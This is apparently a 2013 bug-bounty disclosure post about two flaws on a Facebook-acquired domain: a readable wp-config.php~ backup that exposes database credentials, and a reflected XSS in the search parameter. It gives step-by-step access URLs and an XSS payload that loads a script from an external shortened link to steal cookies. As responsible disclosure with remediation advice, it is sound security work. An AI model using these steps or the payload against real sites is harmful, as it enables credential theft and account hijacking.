Facebooks Boltpeters.com Configuration File Source Code Disclosure Vulnerability
I
want to share two of my finding on Facebooks Acquired domain
Boltpeters.com which I have reported to Facebook on 1 Feburary 2013.
I have found that Facebooks Acquired domain Boltpeters.com Configuration
File was accessible by crafting the config file path
http://boltpeters.com/wp-config.php into a backup file path
http://boltpeters.com/wp-config.php~
Steps to Regenerate the Vulnerability:
1. To extract php source code with database name, MySQL database username
and its password, database hostname, database charset and database
collate etc. Open the following Url http://boltpeters.com/wp-config.php
2. Now change the the actual Url http://boltpeters.com/wp-config.php to http://boltpeters.com/wp-config.php~
3.
Now you can access the php source code with database name, MySQL
database username and its password, database hostname, database charset
and database collate etc as mentioned below:
Configuration File Source Code Disclosure Vulnerability POC Screenshot:
Impact: Configuration
files will disclose sensitive information that will help a malicious
attacker to prepare more advanced attacks. Using this Vulnerability an
attacker can
easily Extract Facebooks Boltpeters.com Database Users ID &
Password.
Recommendation:
The sensitive files path shall not be directly accessible to any anonymous users.
The sensitive backup files path shall not be directly accessible to any anonymous users.
Remove
Configuration File from the web server. As an additional step, it is
recommended to implement a security policy within your organization to
disallow creation of temporary/backup files in directories accessible
from the web.
Filesystem
snapshots should not be accessible via the web if your document root is
on a filesystem using this technology. Configure your web server to
deny access to such directories.
Facebooks Boltpeters.com Reflected XSS
I have found that Facebook's
Boltpeters.com application is vulnerable to Reflected Cross
site Scripting attack as s parameter of this applications
following
Url http://boltpeters.com/?s=test
is used for inputting an searching but as there is no proper input
validation,
filtration or sanitation on server side nor there is any output encoding
etc to prevent this Reflected Cross site Scripting Vulnerability if the
attacker uses the cross domain XSS payload with the combination of
comments. So
the attacker easily can steal the cookies(as http only cookie attribute
missing) of any of those website users and can easily compromise there
account.
Original XSS Vulnerable Url(Reflected XSS Via GET & POST Requests while searching & by Injecting the XSS Payload in Search field):http://boltpeters.com/?s=test
Crafted XSS Vulnerable Url:
http://boltpeters.com/?s="><script src=//goo.gl/p2yht/><!--
XSS Payloads: "><script src=//goo.gl/p2yht/><!--
Vulnerable Parameter: s
Reflected XSS Vulnerability POC Screenshots:
Both the vulnerabilities were mitigated by Facebook Security Team within 5 days + (Rewarded me bounty for my Findings).
Suggestions and Feedbacks are welcome.
